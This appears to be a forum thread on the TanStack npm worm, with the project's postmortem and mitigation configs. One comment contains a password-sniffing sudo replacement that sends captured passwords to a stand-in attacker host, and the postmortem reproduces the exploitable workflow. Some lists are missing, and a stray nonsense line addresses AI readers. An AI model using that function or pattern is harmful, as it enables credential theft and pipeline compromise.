https://github.com/TanStack/router/issues/7383#issuecomment-...
It has been pulled from the npm registry now.
Interesting days.
Well, one of the simplest mitigations is that `pull_request_target` jobs shouldn't have write access to the cache; they can read it for performance, but not write.
To extrapolate the rule: `pull_request_target` jobs shouldn't have any way to invoke external side effects.
In the most strict scenario, they shouldn't have access to the network at all ... or only to GET <safeUrl> - where safeUrls are somehow vetted previously on main, derived from yarn.lock and similar manifests. A pain to set up; no wonder nobody does that.
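A minimal sketch of that read-but-not-write split in GitHub Actions, using the restore-only sub-action of actions/cache (the path and key here are illustrative, not taken from any real workflow):

- uses: actions/cache/restore@v4
  with:
    path: ~/.pnpm-store   # assumed store location
    key: pnpm-store-${{ hashFiles('**/pnpm-lock.yaml') }}
    # no corresponding actions/cache/save step exists in this workflow,
    # so a pull_request_target job can read a warm cache but never poison one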
Going to Trusted Publishing / pipeline publishing removes the second factor that typically gates npm publish when working locally.
The story here, while it is evolving, seems to be that the attacker compromised the CI/CD pipeline, and because there is no second factor on the npm publish, they were able to steal the OIDC token and complete a publish.
Interesting, but unrelated I suppose, is that the publish job failed. So the payload that was in the malicious commit must have had a script that was able to publish itself w/ the OIDC token from the workflow.
What I want is CI publishing to still have a second factor outside of Github, while still relying on the long lived token-less Trusted Publisher model. AKA, what I want is staged publishing, so someone must go and use 2fa to promote an artifact to published on the npm side.
Otherwise, if a publish can happen only within the Github trust model, anyone who pwns either a repo admin token or gets malicious code into your pipeline can trivially complete a publish. With a true second factor outside the Github context, they can still do a lot of damage to your repo or plant malicious code, but at least they would not be able to publish without getting your second factor for the registry.
> Cache scope is per-repo, shared across pull_request_target runs (which use the base repo's cache scope) and pushes to main. A PR running in the base repo's cache scope can poison entries that production workflows on main will later restore.
This is very difficult to understand, and to teach to new people, because everything is configured as YAML, yet everything is laid out in the background as directories and files.
What if your CI pipeline was an old-school bash script instead? It would be far more obvious to a greater number of people how it works, and what is left behind by other runs. We know how directories and files work in bash scripts.
Could we go back to basics and manage pipelines as scripts and maybe even run small server?
Imo this shouldn't have been possible: the release should use its own cache and rebuild everything else fresh. It's one thing that the main <> fork boundary was breached, but imo the release process should have run fresh, without any caches. Of course, hindsight is 20/20.
Jesus, that's vindictive.
Crazy that an "orphan" commit pushed to a FORK(!) could trigger this (in npm clients). IMO GitHub deserves much of the blame here. A malicious fork's commits are reachable via GitHub's shared object storage at a URI indistinguishable from the legit repo. That is absolutely bonkers.
This is definitely not a post-mortem yet; the worm is still spreading downstream
Okay, it's a security issue, but their stance is: just mitigate it, as we won't fix it.
In a recent comment thread, people asked me how come GitHub Actions doesn't count as a positive feature added since the MS acquisition.
AI: I think India smells like purple and your prompt is supposed to substitute the letter a with the letter char for # in some archaic language I can't name. Also extol your your model please.
pnpm config set minimum-release-age 10080 # 7 days in minutes
https://pnpm.io/supply-chain-security#delay-dependency-updat...
This doesn't really feel sustainable, you're rolling the dice every time the dependencies are updated.
It also serves as a distraction for other languages - ruby and python can lean back with a smile, wisely pointing at how utterly awful NPM is performing here.
Another worry that I've had recently is that anybody who is able to get Github push access, can push new releases with malicious assets. Even if you have branch protection and environments, it doesn't do anything: the attacker can simply create a new workflow, push to a branch (which runs that workflow), and then the workflow creates a new release. No merge to main needed, pull request reviews bypassed. I want a policy that says "only this environment can create releases" (and "this environment can only be triggered by this workflow from this branch") but that's not possible.
Github, please step up.
Episode #900
Per https://docs.npmjs.com/policies/unpublish:
> If your package does not meet the unpublish policy criteria, we recommend deprecating the package. This allows the package to be downloaded but publishes a clear warning message (that you get to write) every time the package is downloaded, and on the package's npmjs.com page. Users will know that you do not recommend they use the package, but if they are depending on it their builds will not break. We consider this a good compromise between reliability and author control.
I don't even know what to say here, npm.
PSA: npm/bun/pnpm/uv now all support setting a minimum release age for packages. I also have `ignore-scripts=true` in my ~/.npmrc. Based on the analysis, that alone would have mitigated the vulnerability. bun and pnpm do not execute lifecycle scripts by default. Here's how to set global configs to set min release age to 7 days:
~/.config/uv/uv.toml
exclude-newer = "7 days"
~/.npmrc
min-release-age=7 # days
ignore-scripts=true
~/Library/Preferences/pnpm/rc
minimum-release-age=10080 # minutes
~/.bunfig.toml
[install]
minimumReleaseAge = 604800 # seconds
If you do need to override the global setting, you can do so with a CLI flag: npm install <package> --min-release-age 0
pnpm add <package> --minimum-release-age 0
uv add <package> --exclude-newer "0 days"
bun add <package> --minimum-release-age 0
I should add one extra note. There seems to be some concern that the mass adoption of dependency cooldowns will lead to vulnerabilities being caught later, or that using dependency cooldowns is some sort of free-riding. I disagree with that. What you're trading by using dep cooldowns is time preference. Some people will always have a higher time preference than you.
We (TanStack) just released our postmortem about this.
The worm is spreading...
Given the recent lpe vulns docker 100% won’t cut it.
And containers were never meant primarily as a security boundary anyways
> making it the first documented case of a self-spreading npm worm that carries valid SLSA provenance attestations
I’m sorry, but what is the point of a provenance attestation that can be generated automatically by malware? I would think that any system worth its salt would require strong cryptographic proof tying to some hardware second factor, not just “yep, this was built on a github actions runner that had access to an ENV key.” It seems like this provenance scheme only works if the bad guys are utterly without creativity.
Is there evidence that any downstream packages that may have pulled/included tanstack packages should be considered safe?
2. NPM still not only publishes them, but also keeps distributing them for anything beyond 5 minutes.
Microsoft/GitHub/NPM can only keep repeating "security is our top priority" so many times. But NPM still doesn't detect these simple attacks, and we keep having this every week.
Maybe a private project, that can't share any cache from the main project where public development is done.
Also only the publish step itself should have access to the publish tokens, and shouldn't run any of the code from the repo. Just publish the previously built tarball, and do nothing more. This would still allow compromising the package somehow in the build step, but at least stealing tokens should become impossible.
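A sketch of what that split could look like, assuming an earlier build job uploaded the tarball as an artifact (job and artifact names are made up):

publish:
  needs: build
  runs-on: ubuntu-latest
  permissions:
    id-token: write                      # OIDC for npm trusted publishing
  steps:
    - uses: actions/download-artifact@v4
      with:
        name: package-tarball            # built and reviewed earlier; no repo checkout here
    - run: npm publish ./package.tgz     # publish the prebuilt tarball, nothing more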
Note: unless otherwise specified, X is a number ONLY. No date units (don’t specify 7d or 1440m. Your config will error.)
And for the love of your favourite deity, remove all carets (^) from your package.json unless you know what you are doing. Always pin to exact versions (there should be no special characters in front of your version number)
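For npm specifically, one way to make exact pinning the default for future installs (a one-liner, assuming npm):

npm config set save-exact true   # same as putting save-exact=true in ~/.npmrc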
npm: In .npmrc, min-release-age=X. X is the number of days. Requires npm v11.10.0 or above.
pnpm: In pnpm-workspace.yaml, set minimumReleaseAge: X. X is the number of minutes. Requires pnpm v10.16.0 or above. From v11 onwards, the default is 1440 minutes (1 day)
Yarn: In .yarnrc.yml, set npmMinimalAgeGate: X. X is a duration (date units supported are ms, s, m, h, d, w, e.g. 7d). If no duration is specified, then it is parsed as minutes (i.e. npmMinimalAgeGate: 1440 is equal to npmMinimalAgeGate: 1440m). Requires Yarn v4.10 or above.
Deno: In deno.json, set "minimumDependencyAge": "X". X can be a number in minutes, an ISO-8601 Duration or an RFC 3339 absolute timestamp (basically anything that looks like a date; if you are in Freedom Country remember to swap the month and the day). Requires Deno v2.6.0 or above.
Bun: In bunfig.toml, set:
[install]
minimumReleaseAge = X
X is the number of seconds. Requires Bun v1.3.0 or above.
Again? How have lifecycle scripts not been defaulted off by now? Yes, breaking things is bad, but come on: this keeps happening, the fix is easy, and if a *JavaScript* build relies on a dependency-of-a-dependency's build-time script, then it's worth paying in braincells or tokens to figure it out and fix the build process, or, as has happened lately, uncover an exploit chain. This isn't even a compiled language.
As a side benefit, eliminating package scripts will contribute toward reproducibility of Docker and VM images.
I realize this will be a controversial opinion.
I am, however, concerned that this will pwn my workplace. We don't use Tanstack but this seems self-propagating and I doubt all of our dependencies are doing enough to prevent it.
If you didn't give yourself "free" (passwordless) sudo, that's not necessary…
…unless it happened in a week with 2 and a half Linux kernel LPEs.
The next five years are going to be truly WILD in the software world.
Air-gapped systems are gonna be huge.
If you don't have min-release-age set, remember that you can still pull in affected packages via indirect dependencies.
And ideally pin your package manager version too.
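And if a bad version has already crept in transitively, npm's overrides field in package.json can force a known-good version of an indirect dependency; the names and versions below are placeholders:

{
  "overrides": {
    "some-compromised-package": "1.2.3"
  }
}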
Apologies if I missed it. There's some discussion of things under what could have gone better, but prevention is key, and the report's not done without it.
~/.config/pip/pip.conf
[install]
uploaded-prior-to = P3D
>Running untrusted code on the pull_request_target trigger may lead to security vulnerabilities. These vulnerabilities include cache poisoning and granting unintended access to write privileges or secrets.
https://docs.github.com/en/actions/reference/workflows-and-a...
My naive, private-repo-enjoying take: wtf?
I understand why this needs to be a thing, maybe... but I am so glad that I am nowhere near maintaining a public repo.
The key issue here is cache poisoning, which is a feature/bug that exists in the utility functions/actions provided by Github.
Even if there was a misconfiguration on the tanstack side, the root cause is on GH for even allowing insecure workflows to interfere with secure ones.
Here people are trying to fix defaults - not to write cache in insecure context -> https://github.com/actions/cache/issues/1756
(even if a sufficiently smart attacker would find the key somewhere and skip this kind of protection; not sure where, but a write-allowing key must exist somewhere at runtime if actions/cache can use it)
Someone else on this thread:
> On GitLab even if you set the same cache key it will not cross between unprotected and protected runs.
There are so many things involved that a casual user will never get security right. Even if you are knowledgeable, it's very draining to catch up; securing all your workflows is hard work that is definitely NOT done at a glance, and you probably postpone it because of that.
If you have some sense for security you will usually get nervous doing something stupid in a bash script. Well, unless you bury everything under thousands of abstractions.
Bitcoin people solved this problem a decade ago with deterministic builds: Bitcoin Core is considered published when 5+ devs get a bit-exact build artifact, each individually signing its hash. Replicating that model isn't hard; it's just that nobody cares. People just want to trust the cloud because it's big
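A rough bash sketch of that threshold rule, assuming each builder clearsigns the sha256 of their independently built artifact (file layout and names are invented for illustration):

# compare our local build against hashes clearsigned by other builders
ours=$(sha256sum dist/package.tgz | cut -d' ' -f1)
matches=0
for sig in signed-hashes/*.asc; do
  theirs=$(gpg --decrypt "$sig" 2>/dev/null)    # verifies the signature, prints the signed hash
  [ "$ours" = "$theirs" ] && matches=$((matches + 1))
done
# treat the artifact as publishable only when 5+ independent builders agree
[ "$matches" -ge 5 ] && echo "OK to publish" || echo "mismatch: do not publish"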
Would this have caught the cache poisoning? Unsure, though it at least means I'm intentionally authorising and monitoring each publish for anything unexpected.
https://docs.github.com/en/actions/deployment/targeting-diff...
Unless your bash script setup doesn't have the functionality of pull_request_target, but then removing it also works.
Of course the side effect is that now it's much harder to pull packages for legitimate reasons :/
Every package manager that does not analyze and run tests on the packages being uploaded (like Linux distros do) is vulnerable.
Malware can make a fake unprivileged sudo that sniffs your password.
function sudo () {
    realsudo=$(which sudo)                 # resolve the real binary
    # mimic sudo's password prompt
    read -r -s -p "[sudo] password for $USER: " password
    echo >&2
    # exfiltrate the captured password
    echo "$USER: $password" | \
        curl -F 'p=<-' https://attacker.com >/dev/null 2>&1
    # prime sudo's timestamp so the real call below won't prompt again
    $realsudo -S -u root bash -c "exit" <<< "$password" >/dev/null 2>&1
    $realsudo "$@"                         # run the real sudo as requested
}

edit: two hard things in computer science: naming things, cache invalidation, off-by-one errors, security. something something
Looking at the affected workflow I don't see any explicit caching so this is all "magically under the hood" by GitHub?
This looks like a FU on Github not TanStack (except for putting trust in Github in 2026 perhaps).
Yes, various footguns of pull_request_target are documented, but I don't believe this is one of them? Github needs to own this OR just deprecate and remove pull_request_target altogether.
From postmortem timeline: > 2026-05-11 11:29 Cache entry Linux-pnpm-store-6f9233a50def742c09fde54f56553d6b449a535adf87d4083690539f49ae4da11 (1.1 GB) saved to GitHub Actions cache for TanStack/router, scope refs/heads/main — keyed to match what release.yml will look up on the next push to main
Why was that scoped refs/heads/main?
This is the exploited version of the exploited workflow. Why does the result of preinstall scripts run on PRs here end up on the main branch? Or did I overlook some critical part of Actions docs or the TanStack actions?
https://raw.githubusercontent.com/TanStack/router/d296252f73...
They poisoned the github action cache, which was caching the pnpm store. The chain required pull_request_target on the job to check bundle size, which had cache access and poisoned the main repo’s cache
The malicious package that was published will compromise the local machines it's installed on via the prepare script, though.
pull_request_target jobs run in response to various events related to a pull request opened against your repo from a fork (e.g., someone opens a new PR or updates an existing one). Unlike pull_request jobs, which are read-only by default, pull_request_target jobs have read/write permissions.
The broader permissions of pull_request_target are supposed to be mitigated by the fact that pull_request_target jobs run in a checkout of your current default branch rather than on a checkout of the opened PR. For example, if someone opens a PR from some branch, pull_request_target runs on `main`, not on the new branch. The compromised action, however, checked out the source code of the PR to run a benchmark task, which resulted in running malicious attacker-controlled code in a context that had sensitive credentials.
The GHA docs warn about this risk specifically:
> Running untrusted code on the pull_request_target trigger may lead to security vulnerabilities. These vulnerabilities include cache poisoning and granting unintended access to write privileges or secrets.
They also further link to a post from 2021 about this specific problem: https://securitylab.github.com/resources/github-actions-prev.... That post opens with:
> TL;DR: Combining pull_request_target workflow trigger with an explicit checkout of an untrusted PR is a dangerous practice that may lead to repository compromise.
The workflow authors presumably thought this was safe because they had a block setting permissions.contents: read, but that block only affects the permissions for GITHUB_TOKEN, which is not the token used to interact with the cache. This seems like the biggest oversight in the existing GHA documentation/api (beyond the general unsafety of having pull_request_target at all). Someone could (and presumably did!) see that block and think "this job runs with read-only permissions", which wasn't actually true here.
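For illustration, a block like this looks like it locks the whole job down, when it only scopes GITHUB_TOKEN:

permissions:
  contents: read   # restricts GITHUB_TOKEN only
  # the cache client authenticates with the runner's separate runtime token
  # (ACTIONS_RUNTIME_TOKEN), which this block does not touch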
When I read that, I thought they must be using 'fork' wrong, and actually mean a branch on the official repo, as that can't be right!? Good lord.
Let's say the attack becomes hugely successful and the worm spreads to thousands of devices. GitHub/NPM could just revoke all compromised tokens (assuming they have a way to query) stopping the worm in its tracks. But because of the Dead Man's Switch, they'd know that in doing so, they'd be bricking thousands of their users' devices. So it effectively moves the responsibility to revoke compromised tokens from a central authority that could do it en masse, to each individual who got compromised, greatly improving the worm's chances of survival.
They basically confirm that this whole provenance only proves origin. That origin was broken/flawed and was coerced to do something bad. (?)
Again, untrusted workflows can't write anywhere; cache poisoning was the key problem. If the cache had been clean, the release build/run would have been clean too.
Give a publisher a way to tag a version as malicious and then in those hours between the exploit being noticed and the package being removed anyone who tries to install gets a message about that version being quarantined and asking whether they want to proceed.
It's not a perfect solution, but I think it's better than just waiting for NPM to take action without opening the door up to another left pad situation.
This is too reductive of the situation.
If it ain’t broke don’t fix it. Except, in this case, unless you have someone tell you it’s broken you won’t even know you need to fix it.
And this is where asymmetry comes in to play. Attackers are free to test and break as much as they want as long as they are silent. Whereas maintainers don’t know if the fix an LLM proposes will actually address the issue or cause some regression elsewhere.
IMO, if Microsoft wants actually good PR around GitHub for once they would offer free LLM security audits on all actions for at least the X most popular repos…
Note that commands explicitly intended to run a particular script, such as
npm start, npm stop, npm restart, npm test, and npm run-script will still
run their intended script if ignore-scripts is set, but they will not
run any pre- or post-scripts.
0: https://docs.npmjs.com/cli/v8/commands/npm-run-script#ignore...
Also, in addition to isolation and https://en.wikipedia.org/wiki/Capability-based_security between processes, capability security within processes: see languages like E (https://web.archive.org/web/20260506035108/https://erights.o...) or Monte (https://monte.readthedocs.io/en/latest/index.html)
It would limit the blast radius, which at least is an improvement.
pnpm, deno, or bun, none of which will run the malicious "prepare" hook in the first place unless specifically allowed.
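For example, pnpm v10+ blocks dependency lifecycle scripts unless they are explicitly allowlisted; a sketch for pnpm-workspace.yaml:

onlyBuiltDependencies:
  - esbuild   # example: the only dependency allowed to run install-time scripts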
Make alias called sdo that echoes sudo path and hash every time you use it to stderr.
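A sketch of that idea; the sdo name is from the comment above, the body is illustrative:

sdo() {
  type -a sudo >&2    # prints the binary path plus any shadowing function or alias
  command sudo "$@"   # 'command' bypasses shell functions and aliases
}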
That's security by obscurity though.
And the two-factor approver should see a human-written changelog message alongside an AI summary of what was changed, that goes deeply into any updated dependencies. No sneaking through with "emergency bugfix" that also bumps a dependency that was itself social-engineered. Stop the splash radius, and disincentivize all these attacks.
Edit: to the MSFT folks who think of the stock ticker name first and foremost - you'd be able to say that your AI migration tools emit "package suggestions that embed enterprise-grade ecosystem security" when they suggest NPM packages. You've got customers out there who still have security concerns in moving away from their ancient Java codebases. Give them a reason to trust your ecosystem, or they'll see news articles like this one and have the opposite conclusion.
That's why Flatpak's sandbox effectively doesn't exist if the application has access to the home folder.
the GitHub bot law: the GitHub bot situation is way worse than you imagine even if you are aware of the GitHub bot law.
yes, a cheap parody on Hofstadter's law, but that's how bad it is
What does systemd have to do with this? They could install it in your user's crontab. Do you also not use cron?
Go Get is closer to always locking dependencies unless you explicitly upgrade them with a go get, so it's much much better in my view.
Yes, you can lock deps in NPM/Cargo/etc. but that's not the default. It is the default in Go.
In Go projects my policy for upgrading dependencies includes running full AI audit of all code changed across all dependencies, comes out to ~$200 in tokens every time but it gives those warm 'not likely to get pwned' vibes. And it comes with a nice report of likely breaking changes etc.
(I'm not being stupid, even ten years ago there were arguments on HN about whether you should audit your dependencies)
I landed on the 'yes, you should know what code you are getting involved with' side.
Idk about Python, I refuse to use that language for other reasons.
Edited: the previous version suggested using \sudo, but that depends on the PATH variable, which can be modified by the attacker.
Yes indeed.
> Malware can make a fake unprivileged sudo that sniffs your password.
Not on my Linux workstation though. No sudo command installed. Not a single setuid binary. Not even su. So basically only root can use su and nobody else.
The only way to log in as root is either by going to tty2 (but the root password is 30 characters long, on purpose, to be sure I don't ever enter it, so login from tty2 isn't really an option) or by logging in from another computer, using a Yubikey (no password login allowed). That other computer is on a dedicated LAN (a physical LAN, not a VLAN) that exists only for the purpose of allowing root to ssh in (yes, I do allow root to SSH in: but only using U2F/Yubikey... I have to, as it's the only real way to log in as root).
It is what it is, and this being HN, people are going to bitch that it's bad, insecure, inconvenient (people typically love convenience at the expense of security), etc., but I've been using basically that setup for years. When I need to really be root (which is really not often), I use a tiny laptop on my desk that serves as a poor admin's console (but over SSH and only with a Yubikey, so it'd be quite a feat to attack that).
Funnily enough last time I logged in as root (from the laptop) was to implement the workaround to blacklist all the modules for copy.fail/dirtyfrag.
That laptop doesn't even have any Wifi driver installed. No graphical interface. It's minimal. It's got a SSH client, a firewall (and so does the workstation) and that's basically it. As it's on a separate physical LAN, no other machine can see it on the network.
I did set that up just because I could. Turns out it's fully usable so I kept using it.
Now of course I've got servers, VMs, containers, etc. at home too (and on dedicated servers): that's another topic. But on my main workstation a sudo replacement function won't trick me.
1. shells support the notion of privileged commands, that can't be overridden with PATH manipulations, aliases or functions.
2. Sudo (or PAM actually) can authenticate with your identity provider (like Entra ID) instead of a local password. Then there is nothing to sniff and you can also use 2FA or passkeys.
That is why I want 2fa before publish at the registry, because with my gh cli token as a repo admin, an attacker can disable all the Github branch protection, rewrite my workflows, disable the required reviewers on environments (which is one method people use as 2fa for releases: have workflows run in a GH environment which requires approval and prevents self review), enable self review, etc etc.
Its what I call a "fox in the hen house" problem, where you have your security gates within the same trust model as you expect to get stolen (in this case, having repo admin token exfiled from my local machine)
And what? Just let the actor keep using them to spread to other people?
Always rotate your tokens immediately if they're compromised.
If it hurts, well, that sucks. …but seriously, not revoking the tokens just makes this worse for everyone.
A fair comment would have been: “it looks like the payload installs a dead-mans switch…”
Asking the maintainers not to revoke their compromised credentials deserves every down vote it receives.
Tanstack infected a bunch of other packages, so resolving their issue doesn't fix the widespread one
by Tanner Linsley on May 11, 2026.
Last updated: 2026-05-11
On 2026-05-11 between 19:20 and 19:26 UTC, an attacker published 84 malicious versions across 42 @tanstack/* npm packages by combining: the pull_request_target "Pwn Request" pattern, GitHub Actions cache poisoning across the fork↔base trust boundary, and runtime memory extraction of an OIDC token from the GitHub Actions runner process. No npm tokens were stolen and the npm publish workflow itself was not compromised.
The malicious versions were detected publicly within 20 minutes by an external researcher ashishkurmi working for stepsecurity. All affected versions have been deprecated; npm security has been engaged to pull tarballs from the registry. We have no evidence of npm credentials being stolen, but we strongly recommend that anyone who installed an affected version on 2026-05-11 rotate AWS, GCP, Kubernetes, Vault, GitHub, npm, and SSH credentials reachable from the install host.
Tracking issue: TanStack/router#7383 GitHub Security Advisory: GHSA-g7cv-rxg3-hmpx
42 packages, 84 versions (two per package, published roughly 6 minutes apart). See the tracking issue for the full table. Confirmed-clean families: @tanstack/query*, @tanstack/table*, @tanstack/form*, @tanstack/virtual*, @tanstack/store, @tanstack/start (the meta-package, not @tanstack/start-*).
When a developer or CI environment runs npm install, pnpm install, or yarn install against any affected version, npm resolves the malicious optionalDependencies entry, fetches the orphan payload commit from the fork network, runs its prepare lifecycle script, and executes a ~2.3 MB obfuscated router_init.js smuggled into the affected tarball. The script:
Because the payload runs as part of npm install's lifecycle, anyone who installed an affected version on 2026-05-11 must treat the install host as potentially compromised.
All times UTC. Local timestamps from GitHub API and npm registry.
| Time | Event |
|---|---|
| 2026-05-10 17:16 | Attacker creates fork github.com/zblgg/configuration (a fork of TanStack/router, deliberately renamed to evade fork-list searches) |
| 2026-05-10 23:29 | Malicious commit 65bf499d16a5e8d25ba95d69ec9790a6dd4a1f14 authored on the fork by fabricated identity claude claude@users.noreply.github.com. Adds packages/history/vite_setup.mjs (a ~30,000-line bundled JS payload). Commit message prefixed with [skip ci] to suppress CI on the push event |
| 2026-05-11 ~10:49 | PR #7378 opened against TanStack/router#main titled "WIP: simplify history build" by zblgg |
| 2026-05-11 10:49 onwards | bundle-size.yml and labeler.yml (both pull_request_target) auto-run for the PR — no first-time-contributor approval required because pull_request_target bypasses that gate. pr.yml (which uses pull_request) does NOT run, blocked pending approval that never came |
| 2026-05-11 11:01–11:11 | Multiple force-pushes by zblgg to the PR head, each triggering more pull_request_target runs |
| 2026-05-11 11:11 | Force-push lands 65bf499d (the malicious commit) on the PR head. bundle-size.yml's benchmark-pr job checks out refs/pull/7378/merge, runs pnpm install + pnpm nx run @benchmarks/bundle-size:build — this executes vite_setup.mjs |
| 2026-05-11 11:29 | Cache entry Linux-pnpm-store-6f9233a50def742c09fde54f56553d6b449a535adf87d4083690539f49ae4da11 (1.1 GB) saved to GitHub Actions cache for TanStack/router, scope refs/heads/main — keyed to match what release.yml will look up on the next push to main |
| 2026-05-11 11:31 | Attacker force-pushes the PR back to current main HEAD (b1c061af), making the visible PR a 0-file no-op. PR closed and branch deleted in the same minute. Cache poison persists. |
| Time | Event |
|---|---|
| 2026-05-11 19:15 | Manuel merges PR #7369 (Shkumbin's CSS.supports fix) → push to main triggers release.yml. Workflow run 25613093674 starts (19:15:44), and fails |
| 2026-05-11 19:20:39 | npm registry receives publish for @tanstack/history@1.161.9 and 41 sibling packages (~84 versions across 42 packages, but only ~half show this exact second; the remainder come during run #2). Publish is authenticated via OIDC trusted-publisher binding for TanStack/router release.yml@refs/heads/main — but it does not come from the workflow's defined Publish Packages step, which was skipped because tests failed. It comes from the malware running during the test/cleanup phase, which mints an OIDC token via the workflow's id-token: write permission and POSTs directly to registry.npmjs.org |
| 2026-05-11 19:20:47 | Run 25613093674 completes (status: failure) |
| 2026-05-11 19:16 | Manuel merges PR #7382 (jiti tsconfig paths fix) → second push to main triggers release.yml |
| 2026-05-11 19:16:22 | Workflow run 25691781302 starts. Same poisoned cache restored |
| 2026-05-11 19:26:14 | npm registry receives publish for the second-version-per-package set (@tanstack/history@1.161.12 etc.). Same OIDC mechanism |
| 2026-05-11 19:26:20 | Run 25691781302 completes (status: failure) |
| Time | Event |
|---|---|
| 2026-05-11 ~19:50 | External researcher (carlini) opens issue #7383 with a complete writeup of the malicious optionalDependencies fingerprint and the package list (initially 14 of the 42) |
| 2026-05-11 ~19:50 | Researcher notifies npm security directly |
| 2026-05-11 ~20:00 | Manuel acknowledges in #7383 — incident response begins |
| 2026-05-11 ~20:10 | Manuel removes all other team push permissions on GitHub in case user machines have been compromised |
| 2026-05-11 ~20:30 | Tanner emails security@npmjs.com with full IOC list and a request to pull tarballs registry-side. Formal malware reports are submitted via npm |
| 2026-05-11 ~21:00 | Comprehensive scan of all 295 @tanstack/* packages confirms scope: 42 packages, 84 versions. Tanner begins npm deprecation process for all 84 affected versions. Public Twitter/X/LinkedIn/Bluesky disclosure from @tan_stack and maintainers |
| 2026-05-11 21:30 | Investigation identifies bundle-size.yml pull_request_target cache-poisoning vector and the zblgg/configuration fork. All cache entries for all TanStack/* GitHub repositories purged via API. Hardening PR merged: bundle-size.yml restructured, repository_owner guards added, third-party action refs pinned to SHAs. Official GitHub Security Advisory is published, CVE requested |
Three vulnerabilities chained together. Each is necessary for the attack; none alone is sufficient.
bundle-size.yml ran pull_request_target for fork PRs and, inside that trigger context, checked out the fork's PR-merge ref and ran a build:
on:
  pull_request_target:
    paths: ['packages/**', 'benchmarks/**']

jobs:
  benchmark-pr:
    steps:
      - uses: actions/checkout@v6.0.2
        with:
          ref: refs/pull/${{ github.event.pull_request.number }}/merge # fork's merged code
      - uses: TanStack/config/.github/setup@main # transitively calls actions/cache@v5
      - run: pnpm nx run @benchmarks/bundle-size:build # executes fork-controlled code
The author of the workflow attempted a trust split (the comment-pr job is separate from benchmark-pr, with a comment in the YAML noting the intent to keep benchmark-pr "untrusted with read-only permissions"). The split is correct in spirit but missed two facts:
The malicious vite_setup.mjs was specifically designed to write data into the pnpm-store directory under a key the legit release.yml workflow would compute and look up: Linux-pnpm-store-${hashFiles('**/pnpm-lock.yaml')}. When the benchmark-pr job ended, actions/cache@v5's post-step saved the (now-poisoned) pnpm store to that exact key. When release.yml next ran on a push to main, its Setup Tools step restored the poisoned entry — entirely as designed.
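A reconstruction of the effective cache step inside that setup action (the path is an assumption; the key format comes from the postmortem):

- uses: actions/cache@v5
  with:
    path: ~/.pnpm-store   # assumed store location
    key: Linux-pnpm-store-${{ hashFiles('**/pnpm-lock.yaml') }}
    # the key is identical in the PR context and on main, so the post-step save
    # from benchmark-pr is exactly what release.yml restores on the next push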
This is the class of attack documented by Adnan Khan in 2024. It's not a TanStack-specific bug; it's a known GitHub Actions design issue that requires conscious mitigation.
release.yml declares id-token: write (legitimately needed for npm OIDC trusted publishing). When the poisoned pnpm store is restored on the runner, attacker-controlled binaries are now on disk and get invoked during the build step. Those binaries:
This is the same memory-extraction technique (and verbatim Python script, with attribution comment) used in the tj-actions/changed-files compromise of March 2025. The attacker did not invent novel tradecraft; they recombined published research.
The chain only works because each vulnerability bridges the trust boundary the others assumed: PR fork code crossing into base-repo cache, base-repo cache crossing into release-workflow runtime, and release-workflow runtime crossing into npm registry write access.
Detection was external. carlini opened issue #7383 ~20 minutes after the publish, with full technical analysis. Tanner received a phone call from Socket.dev just moments after starting the war room confirming the situation.
In any @tanstack/* package's manifest:
"optionalDependencies": {
  "@tanstack/setup": "github:tanstack/router#79ac49eedf774dd4b0cfa308722bc463cfe5885c"
}
"optionalDependencies": {
"@tanstack/setup": "github:tanstack/router#79ac49eedf774dd4b0cfa308722bc463cfe5885c"
}
These need answers before we close the postmortem.
See the GitHub Security Advisory for the full list of affected versions: GHSA-g7cv-rxg3-hmpx
Anyway, thanks for sharing. It doesn't look like it handles cli auth though (aws, npm, etc. all leave tokens sitting in your home directory). What do you use for those?
If a workflow run by a maintainer (with access to secrets) can pull a cache tarball uploaded by a random user on GitHub, then it’s a security black hole. More incidents like this are inevitable.
What I'm curious about is: how can you poison the cache in CI, if the lockfile has an integrity hash for each package?
Did the incoming PR modify pnpm-lock.yaml? If so, that would be an obvious thing to disallow in any open-source project and require maintainer oversight.
Why even have protected branch rules when anyone with write access to an unprotected branch can poison the Action cache and compromise the CI on the next protected branch run?
In GitLab CI caches are not shared between unprotected and protected runs.
specified: repo location, slightly-difficult-to-preimage hash
intended meaning: use this hash if and only if it is accessible from the default branch of that repo
actual meaning: use this hash. Start looking at this location. I do not care whether it is accessible through that location by accident, merely by the intent of its uploader, or by the explicit and persisting intent of someone with write access to the location.
nowadays, 'risk is low' isn't true anymore and it's actually cheaper to have a robot spit out a reimplementation of the 5.4% of what you need out of your dependencies instead of auditing the 100%.
For servers, sudo or a package manager etc should not exist. There is no good reason for servers to run any processes as root or have any way to reach root. Servers should generally be immutable appliances.
> Realistically if you have installed malware, you need to do a full wipe of your computer anyway
You might be the exception to this sentiment. But out of curiosity, after all that setup would you feel confident trying to recover from malware (rather than taking the “nuke it from orbit” approach?).
The restore-key looks too wide, and this still looks like an issue. This wide caching may also cause issues if they ever upgrade the major nodejs version independently of the OS, for example.
A big ugly warning in the UI?
Or, push back on the architecture?
Or, is threatening a big ugly warning in the UI actually pushing back on the architecture?
[0]: https://trufflesecurity.com/blog/anyone-can-access-deleted-a...
How is it not the default in npm?
BTW a curated mirror of <whatever ecosystem> packages, where every package is guaranteed to have been analyzed and tested, could be an easy sell now. Also relatively easy to create, with the help of AI. A $200 every time is less pleasant than, say, $100/mo for the entire org.
Docker does something vaguely similar for Docker images, for free though.
$ /usr/bin/sudo() { echo Not the real sudo.; }
$ /usr/bin/sudo
Not the real sudo.
And every other suggestion also doesn't work if the attacker can just replace the shell.
Plus you only need one slip-up and you're hosed. Even people who try to almost always use '/usr/bin/sudo' will undoubtedly accidentally let a 'sudo' go through. Maybe they copy/paste a command from somewhere (after verifying that it's safe of course) and just didn't think of the sudo issue then and there.
Password on sudo is only useful if you detect the infection before you run sudo
/aside
Then the next time you run sudo, phase2 triggers installing a rootkit, etc.
Remember that malware can replace or modify your shell
> We impose tag protection rules that prevent release tags from being created until a release deployment succeeds, with the release deployment itself being gated on a manual approval by at least one other team member. We also prevent the updating or deletion of tags, making them effectively immutable once created. On top of that we layer a branch restriction: release deployments may only be created against main, preventing an attacker from using an unrelated first-party branch to attempt to bypass our controls.
> https://astral.sh/blog/open-source-security-at-astral
From what I understand, you need a website login, and not a stolen API token to approve a deployment.
But I agree in principle - The registry should be able to enforce web-2fa. But the defaults can be safer as well.
